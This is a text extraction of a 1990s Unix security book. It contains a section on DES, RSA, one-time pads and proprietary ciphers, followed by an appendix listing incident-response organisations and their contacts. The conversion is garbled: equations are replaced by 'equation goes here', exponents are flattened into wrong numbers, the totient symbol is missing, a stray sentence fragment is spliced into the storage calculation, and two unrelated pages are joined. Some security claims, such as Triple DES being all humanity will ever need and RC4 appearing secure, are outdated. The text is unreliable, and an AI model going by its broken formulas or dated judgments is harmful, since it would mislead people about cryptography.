2112 = 5.19 x 1033 encryption operations<br />

5.19 x 10 33 encryption operations / 10 12 operations/sec = 5.19 x 10 21 sec<br />

= 1.65 x 10 14 years.<br />

This is more than 16,453 times older than the currently estimated age of the universe (approximately 10 10 years).<br />

Apparently, barring new discoveries uncovering fundamental flaws or weaknesses with the DES algorithm, or<br />

new breakthroughs in the field of cryptanalysis, Triple DES is the most secure private key encryption algorithm<br />

that humanity will ever need (although niche opportunities may exist for faster algorithms).<br />

6.4.6 RSA and Public Key Cryptography<br />

RSA is the most widely known algorithm for performing public key cryptography. The algorithm is named after<br />

its inventors, Ronald Rivest, Adi Shamir, and Leonard Adleman, who made their discovery in the spring of 1977.<br />

Unlike DES, which uses a single key, RSA uses two cryptographic keys: a public key and a secret key. The<br />

public key is used to encrypt a message and the secret key is used to decrypt it. (The system can also be run in<br />

reverse, using the secret key to encrypt data that can be decrypted with the public key.)<br />

The RSA algorithm is covered by U.S. Patent 4,405,829 ("Cryptographic Communications System and Method"),<br />

which was filed for on December 14, 1977; issued on September 20, 1983; and expires on September 20, 2000.<br />

Because a description of the algorithm was published before the patent application was filed, RSA can be used<br />

without royalty everywhere in the world except the United States (international patent laws have different<br />

coverage of prior disclosure and patent applicability).[18] Not surprisingly, RSA is significantly more popular in<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_04.htm (8 of 14) [2002-04-12 10:44:44]


[Chapter 6] 6.4 Common Cryptographic Algorithms<br />

Europe and Japan than in the United States, although its popularity in the U.S. is increasing.<br />

[18] Ongoing controversy exists over whether this, or any other patent granted on what amounts to a<br />

series of mathematical transformations, can properly be patented. Some difference of opinion also<br />

exists about the scope of the patent protection. We anticipate that the courts will need a lot of time to<br />

sort out these issues.<br />

6.4.6.1 How RSA works<br />

The strength of RSA is based on the difficulty of factoring a very large number. The following brief treatment<br />

does not fully explain the mathematical subtleties of the algorithm. If you are interested in more detail, you can<br />

consult the original paper[19] or a text such as those listed in Appendix D.<br />

[19] Rivest, R., Shamir, A., Adleman, L., "A Method for Obtaining Digital Signatures and Public<br />

Key Cryptosystems," Communications of the ACM, Volume 21, Number 2, February 1978.<br />

RSA is based on well-known, number-theoretic properties of modular arithmetic and integers. One property<br />

makes use of the Euler Totient Function, (n). The Totient function of a number is defined as the count of<br />

integers less than that number that are relatively prime to that number. (Two numbers are relatively prime if they<br />

have no common factors; for example, 9 and 8 are relatively prime.) The Totient function for a prime number is<br />

one less than the prime number itself: every positive integer less than the number is relatively prime to it.<br />

The property used by RSA was discovered by Euler and is this: any integer i relatively prime to n raised to the<br />

power of (n) and taken mod n is equal to 1. That is:<br />

equation goes here<br />

Suppose e and d are random integers that are inverses modulo (n), that is:<br />

equation goes here<br />

A related property used in RSA was also discovered by Euler. His theorem says that if M is any number relatively<br />

prime to n, then:<br />

and equation goes here<br />

Cryptographically speaking, if M is part of a message, we have a simple means for encoding it with one function:<br />

equation goes here<br />

and decoding it with another function:<br />

equation goes here<br />

So how do we get appropriate values for n, e, and d? First, two large prime numbers p and q, of approximately<br />

the same size, are chosen, using some appropriate method. These numbers should be large - on the order of<br />

several hundred digits - and they should be kept secret.<br />

Next, the Euler Totient function (pq) is calculated. In the case of n being the product of two primes, ( p q ) = (<br />

p - 1 ) ( q - 1 ) = (n).<br />

Next, we pick a value e that is relatively prime to (n). A good choice would be to pick something in the interval<br />

max ( p + 1, q + 1 ) < e


the modular inverse of e mod (n). If d should happen to be too small (i.e., less than about log2(n)), we pick<br />

another e and d.<br />

Now we have our keys. To encrypt a message m, we split m into fixed-size integers M less than n. Then we find<br />

the value (M e) mod n = s for each portion of the message. This calculation can be done quickly with hardware, or<br />

with software using special algorithms. These values are concatenated to form the encrypted message. To decrypt<br />

the message, it is split into the blocks, and each block is decrypted as (s d) mod n =M.<br />

6.4.6.2 An RSA example<br />

For this example, assume we pick two prime numbers p and q:<br />

p = 251<br />

q = 269<br />

The number n is therefore:<br />

n = 251 * 269 = 67519<br />

The Euler Totient function for this value is:<br />

(n) = (251-1) (269-1) = 67000<br />

Let's arbitrarily pick e as 50253. d is then:<br />

d = e-1 mod 67000 = 27917<br />

because:<br />

50253 * 27917 = 1402913001 = 20939 * 67000 + 1 = 1 ( mod 67000 )<br />

Using n = 67519 allows us to encode any message M that is between 0 and 67518. We can therefore use this<br />

system to encode a text message two characters at a time. (Two characters have 16 bits, or 65536 possibilities.)<br />

Using e as our key, let's encode the message "RSA works!" The sequence of ASCII characters encoding "RSA<br />

works!" is shown in the following table<br />

Table 6.2: RSA Encoding Example<br />

ASCII Decimal Value Encoded Value<br />

"RS" 21075 48467<br />

"A" 16672 14579<br />

"wo" 30575 26195<br />

"rk" 29291 58004<br />

"s!" 29473 30141<br />

.<br />

[Chapter 6] 6.4 Common Cryptographic Algorithms<br />

As you can see, the encoded values do not resemble the original message.<br />

To decrypt, we raise each of these numbers to the power of d and take the remainder mod n. After translating to<br />

ASCII, we get back the original message.<br />

When RSA is used for practical applications, it is used with numbers that are hundreds of digits long. Because<br />

doing math with hundred-digit-long strings is time consuming, modern public key applications are designed to<br />

minimize the number of RSA calculations that need to be performed. Instead of using RSA to encrypt the entire<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_04.htm (10 of 14) [2002-04-12 10:44:44]


[Chapter 6] 6.4 Common Cryptographic Algorithms<br />

message, RSA is used to encrypt a session key, which itself is used to encrypt the message using a high-speed,<br />

private key algorithm such as DES or IDEA.<br />

6.4.6.3 Strength of RSA<br />

The numbers n and either e or d can be disclosed without seriously compromising the strength of an RSA cipher.<br />

For an attacker to be able to break the encryption, he or she would have to find (n), which, to the best of<br />

anyone's knowledge, requires factoring n.<br />

Factoring large numbers is very difficult - no known method exists to do it efficiently. The time required to factor<br />

a number can be several hundred years or several billion years with the fastest computers, depending on how<br />

large the number n is. If n is large enough, it is, for all intents and purposes, unfactorable. The RSA encryption<br />

system is therefore quite strong, provided that appropriate values of n, e, and d are chosen, and that they are kept<br />

secret.<br />

To see how difficult factoring a large number is, let's do a little rough calculation of how long factoring a 200<br />

decimal-digit number would take; this number is more than 70 digits longer than the largest number ever<br />

factored, as of the time this book went to press.<br />

All 200-digit values can be represented in at most 665 binary bits.<br />

1.<br />

has digits.equation goes here<br />

(In general, to factor a 665-bit number using one of the fastest-known factoring algorithms would require<br />

approximately 1.2 x 10 23 operations.)<br />

Let's assume you have a machine that will do 10 billion (10 10) operations per second. (Somewhat faster than<br />

today's fastest parallel computers.) To perform 1.2 x 10 23 operations would require 1.2 x 10 13 seconds, or<br />

380,267 years worth of computer time. If you feel uneasy about having your number factored in 380,267 years,<br />

simply double the size of your prime number: a 400-digit number would require a mere 8.6 x 10 15 years to factor.<br />

This is probably long enough; according to Stephen Hawking's A Brief History of Time, the universe itself is only<br />

about 2 x 10 10 years old.<br />

To give you another perspective on the size of these numbers, assume that you (somehow) could precalculate the<br />

factors of all 200 decimal digit numbers. Simply to store the unfactored numbers themselves would require<br />

approximately (9 x 10 200) x 665 bits of storage (not including any overhead or indexing). Assume that you can<br />

store these on special media that hold 100GB (100 x 1024 4 or approximately 1.1 x 10 14 ) of storage. You would<br />

need about 6.12 x 10 189 of these disks.<br />

Now assume that each of those disks is only one millionth A Brief History of Time, the universe itself is only<br />

about 2 x 1010 of a gram in weight (1 pound is 453.59 grams). The weight of all your storage would come to over<br />

6.75 x 10 177 tons of disk. The planet Earth weighs only 6.588 x 10 21 tons. The Chandrasekhar limit, the amount<br />

of mass at which a star will collapse into a black hole, is about 1.5 times the mass of our Sun, or approximately<br />

3.29 x 10 27 tons. Thus, your storage, left to itself, would collapse into a black hole from which your factoring<br />

could not escape! We are not sure how much mass is in our local galaxy, but we suspect it might be less than the<br />

amount you'd need for this project.<br />

Again, it looks fairly certain that without a major breakthrough in number theory, the RSA mechanism (and<br />

similar methods) are almost assuredly safe from brute-force attacks, provided that you are careful in selecting<br />

appropriately prime numbers to create your key.<br />

Factor This!<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_04.htm (11 of 14) [2002-04-12 10:44:44]


[Chapter 6] 6.4 Common Cryptographic Algorithms<br />

Not a year goes by without someone claiming to have made a revolutionary breakthrough in the field of factoring<br />

- some new discovery which "breaks" RSA and leaves any program based upon it vulnerable to decoding.<br />

To help weed out the frauds from the real findings, RSA Data <strong>Sec</strong>urity has created a challenge list of numbers.<br />

Each number on the list is the product of two large prime numbers. When the folks at RSA are contacted by<br />

somebody who claims a factoring breakthrough (and usually promises to keep the breakthrough a secret in<br />

exchange for some cash), they give the person a copy of the RSA challenge numbers.<br />

The first RSA challenge number was published in the August 1977 issue of Scientific American. The number was<br />

129 digits long, and $100 was offered for finding its factors. The RSA-129 number was solved in the fall of 1994<br />

by an international team of more than 600 volunteers.<br />

A month later, a researcher at the MIT AI Laboratory contacted one of the authors of this chapter, claiming a new<br />

factoring breakthrough. But there was a catch: to prove that he had solved the factoring problem, the researcher<br />

had factored that same RSA-129 number.<br />

Nice try. That one has already been solved. If you are interested in the fame and fortune that comes from finding<br />

new factoring functions, try factoring this:<br />

RSA-140 =<br />

2129024631825875754749788201627151749780670396327721627823338321538194<br />

9984056495911366573853021918316783107387995317230889569230873441936471<br />

If you factor this number, you'll get more than fame: you'll get cash. RSA Data <strong>Sec</strong>urity keeps a "jackpot" for<br />

factoring winners. The pot grows by $1750 every quarter. The first quarter of 1995, it was approximately<br />

$15,000.<br />

You can get a complete list of all the RSA challenge numbers by sending an electronic mail message to<br />

challenge-rsa-list@rsa.com.<br />

6.4.7 An Unbreakable Encryption Algorithm<br />

One type of encryption system is truly unbreakable: the so-called one-time pad mechanism. A one-time pad is<br />

illustrated in Figure 6.4.<br />

The one-time pad often makes use of the mathematical function known as exclusive OR (XOR, ). If you XOR a<br />

number with any value V, then you get a second, encrypted number. XOR the encrypted number with value V a<br />

second time, and you'll get your starting number back. That is:<br />

message = M<br />

ciphertext = M V<br />

plaintext = ciphertext V = ((M V) V)<br />

A system based on one-time pads is mathematically unbreakable (provided that the key itself is truly random)<br />

because you can't do a key search: if you try every possible key, you will get every possible message of the same<br />

length back. How do you tell which one is correct?<br />

Unfortunately, there is a catch: to use this system, you need to have a stream of values - a key, if you will - that is<br />

at least as long as the message you wish to encrypt. Each character of your message is XOR'ed, bit by bit, with<br />

each successive character of the stream.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_04.htm (12 of 14) [2002-04-12 10:44:44]


[Chapter 6] 6.4 Common Cryptographic Algorithms<br />

Figure 6.4: A one-time pad<br />

One-time pads have two important vulnerabilities:<br />

1.<br />

2.<br />

The stream of random values must be truly random. If there is any regularity or order, that order can be<br />

measured and exploited to decode the message.<br />

The stream must never be repeated. If it is, a sophisticated cryptanalyst can find the repeats and use them to<br />

decode all messages that have been encoded with the no-longer one-time pad.<br />

Most one-time pads are generated with machines based on nuclear radioactive decay, a process that is believed to<br />

be unpredictable, if not truly random. Almost every "random number generator" you will find on any standard<br />

computer system will not generate truly random numbers: the sequence will eventually repeat.<br />

To see how this encryption mechanism works in practice, imagine the following one-time pad:<br />

23 43 11 45 23 43 98 43 52 86 43 87 43 92 34<br />

With this sequence, the message:<br />

<strong>UNIX</strong> is secure.<br />

Might encrypt as follows:<br />

:\:\:s*:3:\rEs[drNERwe.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_04.htm (13 of 14) [2002-04-12 10:44:44]


[Chapter 6] 6.4 Common Cryptographic Algorithms<br />

Which is really a printed representation of the following string of values:<br />

69 98 85 55 66 17 11 71 51 72 34 89 57 12<br />

To use a one-time pad system, you need two copies of the pad: one to encrypt the message, and the other to<br />

decrypt the message. Each copy must be destroyed after use; after all, if an attacker should ever obtain a copy of<br />

the pad, then any messages sent with it would be compromised.<br />

One of the main uses of one-time pads has been for sensitive diplomatic communications that are subject to<br />

heavy monitoring and intensive code breaking attempts - such as the communication lines between the U.S.<br />

Embassy in Moscow and the State Department in Washington, D.C. However, the general use of one-time pads is<br />

limited because generating the sequence of random bits is difficult, and distributing it securely to both the sender<br />

and the recipient of the message is expensive.<br />

Because of the problems associated with one-time pads, other kinds of algorithms are normally employed for<br />

computer encryption. These tend to be compact, mathematically based functions. The mathematical functions are<br />

frequently used to generate a pseudorandom sequence of numbers that are XOR'ed with the original message -<br />

which is similar to the way the one-time pad works. (For example, Jim Bidzos, president of RSA Data <strong>Sec</strong>urity,<br />

likes to call its RC4 stream cipher a "one-time pad generator," although the cipher is clearly not such a thing.)<br />

The difference between the two techniques is that, with mathematical functions, you can always - in principle, at<br />

least - translate any message encrypted with these methods back into the original message without knowing the<br />

key.<br />

6.4.8 Proprietary Encryption Systems<br />

The RC4 algorithm mentioned in the previous section is an example of a so-called proprietary encryption<br />

algorithm: an encryption algorithm developed by an individual or company which is not made publicly available.<br />

There are many proprietary algorithms in use today. Usually, the algorithms are private key algorithms that are<br />

used in place of algorithms such as DES or IDEA.[20] Although some proprietary systems are relatively secure,<br />

the vast majority are not. To make matters worse, you can rarely tell which are safe and which are not - especially<br />

if the company selling the encryption program refuses to publish the details of the algorithm.<br />

[20] While creating a public key encryption system is difficult, creating a private key system is<br />

comparatively easy. Making a private key system that is secure, on the other hand, is a considerably<br />

more difficult endeavor.<br />

A standard tenet in data encryption is that the security of the system should depend completely on the security of<br />

the encryption key. When choosing an encryption system, rely on formal mathematical proofs of security, rather<br />

than on secret proprietary systems. If the vendor of an encryption algorithm or technology will not disclose the<br />

algorithm and show how it has been analyzed to show its strength, you are probably better off avoiding it.<br />

The RC4 algorithm is no exception to this tenet. In 1994, an unknown person or persons published source code<br />

that claimed to be RC4 on the <strong>Internet</strong>. By early 1996, a number of groups around the world had started to find<br />

minor flaws in the algorithm, most of them having to do with weak keys. Although RC4 appears to be secure for<br />

most applications at this time, the clock may be ticking.<br />

6.3 The Enigma Encryption<br />

System<br />

6.5 Message Digests and<br />

Digital Signatures<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_04.htm (14 of 14) [2002-04-12 10:44:44]


[Appendix F] F.3 Emergency Response Organizations<br />

Appendix F<br />

Organizations<br />

F.3 Emergency Response Organizations<br />

The Department of Justice, FBI, and U.S. <strong>Sec</strong>ret Service organizations listed below investigate violations<br />

of the federal laws described in Chapter 26, Computer <strong>Sec</strong>urity and U.S. Law. The various response<br />

teams that comprise the Forum of Incident and Response <strong>Sec</strong>urity Teams (FIRST) do not investigate<br />

computer crimes per se, but provide assistance when security incidents occur; they also provide research,<br />

information, and support that can often help those incidents from occurring or spreading.<br />

F.3.1 Department of Justice (DOJ)<br />

Criminal Division<br />

General Litigation and Legal<br />

Advice <strong>Sec</strong>tion<br />

Computer Crime Unit<br />

Department of Justice<br />

Washington, DC 20001<br />

Voice: +1-202-514-1026<br />

F.3.2 Federal Bureau of Investigation (FBI)<br />

National Computer Crimes Squad<br />

Federal Bureau of Investigation<br />

7799 Leesburg Pike<br />

South Tower, Suite 200<br />

Falls Church, VA 22043<br />

Voice: +1-202-324-9164<br />

F.3.3 U.S. <strong>Sec</strong>ret Service (USSS)<br />

Financial Crimes Division Electronic Crime<br />

Branch U.S. <strong>Sec</strong>ret Service Washington, DC 20001 Voice:<br />

+1-202-435-7700<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_03.htm (1 of 10) [2002-04-12 10:44:45]


[Appendix F] F.3 Emergency Response Organizations<br />

F.3.4 Forum of Incident and Response <strong>Sec</strong>urity Teams (FIRST)<br />

The Forum of Incident and Response <strong>Sec</strong>urity Teams (FIRST) was established in March 1993. FIRST is<br />

a coalition that brings together a variety of computer security incident-response teams from the public<br />

and private sectors, as well as from universities. FIRST's constituents comprise many response teams<br />

throughout the world. FIRST's goals are to:<br />

●<br />

●<br />

●<br />

●<br />

Boost cooperation among information technology users in the effective prevention of, detection of,<br />

and recovery from computer security incidents<br />

Provide a means to alert and advise clients on potential threats and emerging incident situations<br />

Support and promote the actions and activities of participating incident response teams, including<br />

research and operational activities<br />

Simplify and encourage the sharing of security-related information, tools, and techniques<br />

FIRST sponsors an annual workshop on incident response that includes tutorials and presentations by<br />

members of response teams and law enforcement.<br />

FIRST incorporated in mid-1995 as a nonprofit entity. One consequence of this is a migration of FIRST<br />

<strong>Sec</strong>retariat duties away from NIST. However, as this book goes to press, the <strong>Sec</strong>retariat can still be<br />

reached at:<br />

FIRST <strong>Sec</strong>retariat<br />

Forum of Incident and Response <strong>Sec</strong>urity Teams<br />

National Institute of Standards and Technology<br />

A-216 Technology Building<br />

Gaithersburg, MD 20899-0001<br />

Phone: +1-301-975-3359<br />

Email: first-sec@first.org<br />

http://www.first.org/first<br />

At the time this book went to press, FIRST consisted of the organizations that are listed below (also<br />

provided is a description of the constituencies served by each of the organizations). Check online for the<br />

most up-to-date list of members.<br />

If you have a security problem or need assistance, first attempt to determine which of these organizations<br />

most clearly covers your operations and needs. If you are unable to determine which (if any) FIRST<br />

group to approach, call any of them for a referral to the most appropriate team.<br />

Most of these response teams have a PGP key with which they sign their advisories or enable<br />

constituents to report problems in confidence. A copy of the PGP keyring is kept as:<br />

ftp://coast.cs.purdue.edu/pub/response-teams/first-contacts-keys.asc<br />

Most teams have arrangements to monitor their phones 24 hours a day, 7 days a week.<br />

F.3.4.1 All <strong>Internet</strong> sites<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_03.htm (2 of 10) [2002-04-12 10:44:45]


[Appendix F] F.3 Emergency Response Organizations<br />

Organization: CERT Coordination Center<br />

Email: cert@cert.org<br />

Telephone: +1-412-268-7090<br />

FAX: +1-412-268-6989 FTP:<br />

ftp://info.cert.org<br />

WWW: http://www.sei.cmu.edu/technology/trustworthy.html<br />

Note: The CERT (sm) Coordination Center (CERT-CC)<br />

is the organization that grew from the computer emergency response<br />

team formed by the Advanced Research Projects Agency (ARPA) in November<br />

1988 (in the wake of the <strong>Internet</strong> Worm and similar incidents). The<br />

CERT charter is to work with the <strong>Internet</strong> community to facilitate<br />

its response to computer security events involving <strong>Internet</strong> hosts,<br />

to take proactive steps to raise the community's awareness<br />

of computer security issues, and to conduct research into improving<br />

the security of existing systems. Their WWW and FTP archive contain<br />

an extensive collection of alerts about past (and current) security<br />

F.3.4.2 ANS customers<br />

Organization: Advanced Network & Services, Inc. (ANS)<br />

Email: anscert@ans.net<br />

Voice: +1-313-677-7333<br />

FAX: +1-313-677-7310<br />

F.3.4.3 Apple Computer worldwide R&D community<br />

Organization: Apple COmputer REsponse Squad:Apple CORES<br />

Email: lsefton@apple.com<br />

Voice: +1-408-974-5594 FAX: +1-408-974-4754<br />

F.3.4.4 Australia: <strong>Internet</strong> .au domain<br />

Organization: Australian Computer Emergency Response Team (AUSCERT)<br />

Email: auscert@auscert.org.au<br />

Voice: +61-7-3365-4417<br />

FAX: +61-7-3365-4477<br />

WWW: http://www.auscert.org.au<br />

F.3.4.5 Bellcore<br />

Organization: Bellcore<br />

Email: sb3@cc.bellcore.com<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_03.htm (3 of 10) [2002-04-12 10:44:45]


[Appendix F] F.3 Emergency Response Organizations<br />

Voice: +1-908-758-5860<br />

FAX: +1-908-758-4504<br />

F.3.4.6 Boeing<br />

Organization: Boeing CERT (BCERT)<br />

Email: compsec@maple.al.boeing.com<br />

Voice: +1-206-657-9405<br />

After Hours: +1-206-655-2222<br />

FAX: +1-206-657-9477<br />

Note: All Boeing computing and communication assets for all<br />

Boeing Divisions headquartered in Seattle, Washington, with major<br />

out plant operations in Wichita, Kansas; Philadelphia, Pennsylvania;<br />

Huntsville, Alabama; Houston, Texas; Winnipeg, Canada; and worldwide<br />

customer interface offices.<br />

F.3.4.7 Italy: <strong>Internet</strong> sites<br />

Organization: CERT-IT<br />

Email: cert-it@dsi.unimi.it<br />

Telephone: +39-2-5500-391<br />

Emergency Phone: +39-2-5500-392<br />

FAX: +39-2-5500-394<br />

F.3.4.8 CISCO Systems<br />

Organization: Network <strong>Sec</strong>urity Council<br />

Email: karyn@cisco.com<br />

Telephone: +1-408-526-5638<br />

FAX: +1-408-526-5420<br />

F.3.4.9 Digital Equipment Corporation and customers<br />

Organization: SSRT (Software <strong>Sec</strong>urity Response Team)<br />

Email: rich.boren@cxo.mts.dec.com<br />

Voice: +1-800-354-9000<br />

Emergency Phone: +1-800-208-7940<br />

FAX: +1-901-761-6792<br />

F.3.4.10 DOW USA<br />

Organization: DOW USA<br />

Email: whstewart@dow.com<br />

Voice: +1-517-636-8738<br />

FAX: +1-517-638-7705<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_03.htm (4 of 10) [2002-04-12 10:44:45]


[Appendix F] F.3 Emergency Response Organizations<br />

F.3.4.11 EDS and EDS customers worldwide<br />

Organization: EDS<br />

Email: jcutle01@novell.trts01.eds.com<br />

Voice: +1-313-265-7514<br />

FAX: +1-313-265-3432<br />

F.3.4.12 France: universities, Ministry of Research and Education in France, CNRS, CEA,<br />

INRIA, CNES, INRA, IFREMER, and EDF<br />

Organization: RENATER<br />

Email: morel@urec.fr<br />

Voice: +33-1-44-27-26-12<br />

FAX: +33-1-44-27-26-13<br />

F.3.4.13 General Electric<br />

Organization: General Electric Company<br />

Email: sandstrom@geis.geis.com<br />

Voice: +1-301-340-4848<br />

FAX: +1-301-340-4059<br />

F.3.4.14 Germany: DFN-WiNet <strong>Internet</strong> sites<br />

Organization: DFN-CERT (Deutsches Forschungsnetz)<br />

Email: dfncert@cert.dfn.de<br />

Telephone: +49-40-54715-262<br />

FAX: +49-40-54715-241<br />

FTP: ftp://ftp.cert.dfn.de/pub<br />

WWW: http://www.cert.dfn.de<br />

Note: The DFN-CERT maintains an extensive online archive of<br />

tools, advisories, newsletters and information from other teams<br />

and organizations. It also maintains a directory of European response<br />

teams.<br />

F.3.4.15 Germany: government institutions<br />

Organization: BSI/GISA<br />

Email: fwf@bsi.de<br />

Telephone: +49-228-9582-444<br />

FAX: +49-228-9852-400<br />

F.3.4.16 Germany: Southern area<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_03.htm (5 of 10) [2002-04-12 10:44:45]


[Appendix F] F.3 Emergency Response Organizations<br />

Organization: Micro-BIT Virus Center<br />

Email: ry15@rz.uni-karlsruhe.de<br />

Voice: +49-721-37-64-22<br />

Emergency Phone: +49-171-52-51-685<br />

FAX: +49-721-32-55-0<br />

F.3.4.17 Hewlett-Packard customers<br />

Organization: HP <strong>Sec</strong>urity Response Team<br />

Email: security-alert@hp.com<br />

F.3.4.18 JP Morgan employees and customers<br />

Organization: JP Morgan Incident Response Team<br />

Telephone: +1-212-235-5010<br />

F.3.4.19 MCI Corporation<br />

Organization: Corporate System <strong>Sec</strong>urity<br />

Email: 6722867@mcimail.com<br />

Telephone: +1-719-535-6932<br />

FAX: +1-719-535-1220<br />

F.3.4.20 MILNET<br />

Response Team; DDN (Defense Data Network)<br />

Email: scc@nic.ddn.mil<br />

Voice: +1-800-365-3642<br />

FAX: +1-703-692-5071<br />

F.3.4.21 Motorola, Inc. and subsidiaries<br />

Response Team Motorola Computer Emergency Response Team (MCERT)<br />

Email: mcert@mot.com<br />

Voice: +1-847-576-1616<br />

Emergency Phone: +1-847-576-0669<br />

FAX: +1-847-538-2153<br />

F.3.4.22 NASA: Ames Research Center<br />

Organization: NASA Ames<br />

Email: hwalter@nas.nasa.gov<br />

Telephone: +1-415-604-3402<br />

FAX: +1-415-604-4377<br />

F.3.4.23 NASA: Goddard Space Flight Center<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_03.htm (6 of 10) [2002-04-12 10:44:45]


[Appendix F] F.3 Emergency Response Organizations<br />

Organization: Goddard Space Flight Center<br />

Email: hmiddleton@gsfcmail.nasa.gov<br />

Telephone: +1-301-286-7233<br />

FAX: +1-301-286-2923<br />

F.3.4.24 NASA: NASA-wide<br />

Organization: NASA Automated Systems Incident Response Capability<br />

Email: nasirc@nasirc.nasa.gov<br />

Voice: +1-800-762-7472 (U.S.)<br />

After Hours: +1-800-759-7243, pin 2023056<br />

FAX: +1-301-441-1853<br />

F.3.4.25 Netherlands: SURFnet-connected sites<br />

Organization: CERT-NL<br />

Email: cert-nl@surfnet.nl<br />

Telephone: +31-302-305-305<br />

FAX: +31-302-305-329<br />

F.3.4.26 NIST (National Institute of Standards and Technology)<br />

Organization: NIST/CSRC<br />

Email: jwack@nist.gov<br />

Telephone: +1-301-975-3359<br />

FAX: +1-301-948-0279<br />

F.3.4.27 NORDUNET: Denmark, Sweden, Norway, Finland, Iceland<br />

Organization: Nordunet<br />

Email: ber@sunet.se<br />

Telephone: +46-8-790-6513<br />

FAX: +46-8-24-11-79<br />

F.3.4.28 Northwestern University<br />

Organization: NU-CERT<br />

Email: nu-cert@nwu.edu<br />

Telephone: +1-847-491-4056<br />

FAX: +1-847-491-3824<br />

F.3.4.29 Pennsylvania State University<br />

Organization: Penn State<br />

Email: krk5@psuvm.psu.edu<br />

Voice: +1-814-863-9533<br />

After Hours: +1-814-863-4375<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_03.htm (7 of 10) [2002-04-12 10:44:45]


[Appendix F] F.3 Emergency Response Organizations<br />

FAX: +1-814-865-3082<br />

F.3.4.30 Purdue University<br />

Organization: PCERT<br />

Email: pcert@cs.purdue.edu<br />

Voice: +1-317-494-7844<br />

After Hours: +1-317-743-4333, pin 4179<br />

FAX: +1-317-494-0739<br />

F.3.4.31 Small Business Association (SBA): small business community nationwide<br />

Organization: SBA CERT<br />

Email: hfb@oirm.sba.gov<br />

Voice: +1-202-205-6708<br />

FAX: +1-202-205-7064<br />

F.3.4.32 Sprint<br />

Organization: Sprint DNSU<br />

Email: steve.matthews@sprint./sprint.com<br />

Voice: +1-703-904-2406<br />

FAX: +1-703-904-2708<br />

F.3.4.33 Stanford University<br />

Response Team: SUNSet - Stanford University Network <strong>Sec</strong>urity Team<br />

Email: security@stanford.edu<br />

Telephone: +1-415-723-2911<br />

FAX: +1-415-725-1548<br />

F.3.4.34 Sun Microsystems customers<br />

Organization: Sun Microsystem's Customer Warning System (CWS)<br />

Email: security-alert@sun.com<br />

Voice: +1-415-688-9151<br />

FAX: +1-415-688-8674<br />

F.3.4.35 SWITCH-connected sites<br />

Organization: SWITCH-CERT<br />

Email: cert-staff@switch.ch<br />

Telephone: +41-1-268-1518<br />

FAX: +41-1-268-1568<br />

WWW: http://www.switch.ch/switch/cert<br />

Note: SWTCH<br />

is The Swiss Academic and Research Network<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_03.htm (8 of 10) [2002-04-12 10:44:45]


[Appendix F] F.3 Emergency Response Organizations<br />

F.3.4.36 TRW network area and system administrators<br />

Computer Emergency Response Committee for Unclassified Systems<br />

Email: zorn@gumby.sp.trw.com<br />

Voice: +1-310-812-1839, 9-5PM, PST<br />

FAX: +1-310-813-4621<br />

F.3.4.37 UK: Defense Research Agency<br />

Organization: Defense Research Agency, Malvern<br />

Email: shore@ajax.dra.hmg.gb<br />

Telephone: +44-1684-895425<br />

FAX: +44-1684-896113<br />

F.3.4.38 U.K. JANET network<br />

Organization: JANET-CERT<br />

Email: cert@cert.ja.net<br />

Telephone: +44-01235-822-302<br />

Fax: +44-01235-822-398<br />

F.3.4.39 UK: other government departments and agencies<br />

Organization: CCTA Email: cbaxter.esb.ccta@gnet.gov.uk<br />

Voice: +44-0171-824-4101/2<br />

FAX: +44-0171-305-3178<br />

F.3.4.40 Unisys internal and external users<br />

Organization: UCERT<br />

Email: garb@po3.bb.unisys.com<br />

Voice: +1-215-986-4038<br />

FAX: +1-212-986-4409<br />

F.3.4.41 U.S. Air Force<br />

Organization: AFCERT<br />

Email: afcert@afcert.csap.af.mil<br />

Voice: +1-210-977-3157<br />

FAX: +1-210-977-4567<br />

F.3.4.42 U.S. Department of Defense<br />

Organization: ASSIST<br />

Email: assist@assist.mil<br />

Voice: +1-800-357-4231 (DSN 327-4700)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_03.htm (9 of 10) [2002-04-12 10:44:45]


[Appendix F] F.3 Emergency Response Organizations<br />

FAX: +1-703-607-4735 (DSN 327-4735)<br />

F.3.4.43 U.S. Department of Energy sites, Energy Sciences Network (ESnet), and DOE<br />

contractors<br />

Organization: CIAC (Computer Incident Advisory Capability)<br />

Email: ciac@llnl.gov<br />

Voice: +1-510-422-8193<br />

FAX: +1-510-423-8002<br />

FTP: ftp://ciac.llnl.gov/pub/ciac<br />

WWW: http://ciac.llnl.gov<br />

Note: The CIAC maintains an extensive online archive of tools,<br />

advisories, newsletters, and other information.<br />

F.3.4.44 U.S. Department of the Navy<br />

Organization: NAVCIRT (Naval Computer Incident Response Team)<br />

Email: ldrich@fiwc.navy.mil<br />

Voice: +1-804-464-8832<br />

Pager: +1-800-SKYPAGE, pin # 5294117<br />

F.3.4.45 U.S. Veteran's Health Administration<br />

Organization: Veteran's Health Incident Response <strong>Sec</strong>urity Team<br />

Email: frank.marino@forum.va.gov<br />

Telephone: +1-304-263-0811, ext 4062<br />

FAX: +1-304-263-4748<br />

F.3.4.46 Westinghouse Electric Corporation<br />

Response Team (W)CERT<br />

